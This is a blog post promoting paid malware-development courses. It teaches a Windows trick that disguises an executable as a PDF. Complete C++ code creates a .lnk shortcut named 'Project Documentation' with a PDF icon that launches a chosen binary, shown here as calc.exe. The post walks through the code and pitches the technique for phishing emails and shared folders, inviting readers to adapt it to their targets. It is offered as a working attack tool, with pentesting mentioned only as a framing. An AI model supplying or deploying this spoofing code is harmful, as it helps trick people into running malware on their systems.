PDF Icon File Spoofing
Welcome to my new Malware Development post, in this one i wanna show you a simple but useful technique to cheat the victim user to click on a “PDF” file and execute our binary.
A offensive technique like this can be useful in some cases as Malware Developer or Pentester like the following one:
Imagine you’re a pentester hired to test the security of a company’s internal network. You need to see if employees can be tricked into opening malicious files. By disguising your malware as a harmless-looking PDF, you can send it in a phishing email or place it in a shared folder. If an employee clicks on it, you’ll get access to their system, revealing how vulnerable the company’s security really is.
Our Malware Development Text Modules subscription is finally here! Dive deep into Windows OS malware techniques, from beginner to advanced, all in C++.
- New module every 15 days
- Over 45 minutes of reading time per module
- Starting at just $5/month
Also here you have my first course that basically it’s a Introduction to Windows Malware Development using C++. It’s available from $15.
Code
Here you have a GitHub Repository where you can find the code to create this link file and the pdf icon:
#include <windows.h>
#include <shlobj.h>
#include <atlbase.h>
#include <string>
#include <iostream>
bool CreateShortcut(const std::wstring& targetPath, const std::wstring& shortcutPath, const std::wstring& iconPath)
{
HRESULT hres;
CComPtr<IShellLink> psl;
CoInitialize(NULL);
hres = CoCreateInstance(CLSID_ShellLink, NULL, CLSCTX_INPROC_SERVER, IID_IShellLink, (LPVOID*)&psl);
if (SUCCEEDED(hres))
{
CComPtr<IPersistFile> ppf;
psl->SetPath(targetPath.c_str());
psl->SetIconLocation(iconPath.c_str(), 0);
hres = psl->QueryInterface(IID_IPersistFile, (LPVOID*)&ppf);
if (SUCCEEDED(hres))
{
hres = ppf->Save(shortcutPath.c_str(), TRUE);
ppf.Release();
}
psl.Release();
}
CoUninitialize();
return SUCCEEDED(hres);
}
int main()
{
std::wstring targetPath = L"C:\\Windows\\System32\\calc.exe";
std::wstring shortcutPath = L"C:\\Users\\b\\Desktop\\Project Documentation.lnk";
// icon path its the same than this path, find the current path
char buffer[MAX_PATH];
GetModuleFileNameA(NULL, buffer, MAX_PATH);
std::string::size_type pos = std::string(buffer).find_last_of("\\/");
std::string path = std::string(buffer).substr(0, pos);
std::wstring iconPath = std::wstring(path.begin(), path.end()) + L"\\pdfIcon.ico";
if (CreateShortcut(targetPath, shortcutPath, iconPath))
{
return 0;
}
else
{
return 1;
}
}This C++ program creates a Windows shortcut (.lnk file) on the desktop. The shortcut points to a target executable (in this case, calc.exe) and uses a custom icon.
Breakdown of the Code
- Includes and Namespace Usages:
- The program includes necessary Windows API functions, Shell API, ATL (Active Template Library) classes, and standard C++ libraries.
- CreateShortcut Function:
- This function takes three parameters:
targetPath,shortcutPath, andiconPath. It creates a shortcut that points totargetPathand saves it asshortcutPathwith the specifiediconPath.
- COM Initialization:
- The program initializes the COM library to allow the use of COM objects.
- Create IShellLink Instance:
- It creates a ShellLink object (
IShellLink), which is used to set the properties of the shortcut.
- Set Shortcut Properties:
- If the ShellLink object is successfully created, the program sets the target path and icon location for the shortcut.
- It uses the
IPersistFileinterface to save the shortcut to disk.
- COM Uninitialization:
- The program uninitializes the COM library after the operations are completed.
- Return Status:
- The function returns true if the shortcut was created successfully, otherwise false.
- Main Function:
- The main function defines the
targetPath(the path to the calculator executable),shortcutPath(the path where the shortcut will be saved), and determines theiconPath(the path to the icon file). - It retrieves the current executable’s path and constructs the path to the icon file.
- The function calls
CreateShortcutwith the specified paths and returns0on success,1on failure.
Usage
To use this tool you only need to change this two paths and recompile the C++ application:
Result
Desktop:
File Explorer:
Properties:
Conclusions
In this post, we’ve explored the technique of PDF Icon File Spoofing, a crafty method used to deceive users into executing a malicious binary by disguising it as a harmless PDF file. By manipulating the file’s appearance, we can significantly increase the chances of an unsuspecting user clicking on it, thereby compromising their system.
This method can be particularly effective for penetration testers or malware developers looking to assess or exploit the security vulnerabilities of a target system. As demonstrated in our example scenario, disguising malware as a PDF and distributing it via phishing emails or shared folders can help identify security weaknesses in an organization’s internal network.
The provided C++ code illustrates how to create a Windows shortcut (.lnk file) with a custom icon, pointing to a specified target executable. By understanding and applying this technique, you can see firsthand how seemingly benign files can be leveraged to gain unauthorized access.
To further your skills in malware development, consider subscribing to our Malware Development Text Modules. With a new module every 15 days, you can dive deep into Windows OS malware techniques, ranging from beginner to advanced levels, all in C++. Additionally, our introductory course on Windows Malware Development using C++ is available, offering comprehensive insights into advanced malware techniques.
For practical implementation, the GitHub repository linked in this post provides the complete code for creating a PDF icon file type spoofer. By modifying and recompiling this code, you can tailor the tool to suit specific use cases and targets.
Get ready to unlock the secrets of ethical malware development with our unique academy! We’re taking a different path through the world of cybersecurity, and here’s why you should jump on board:
Thanks to read this :)
S12.
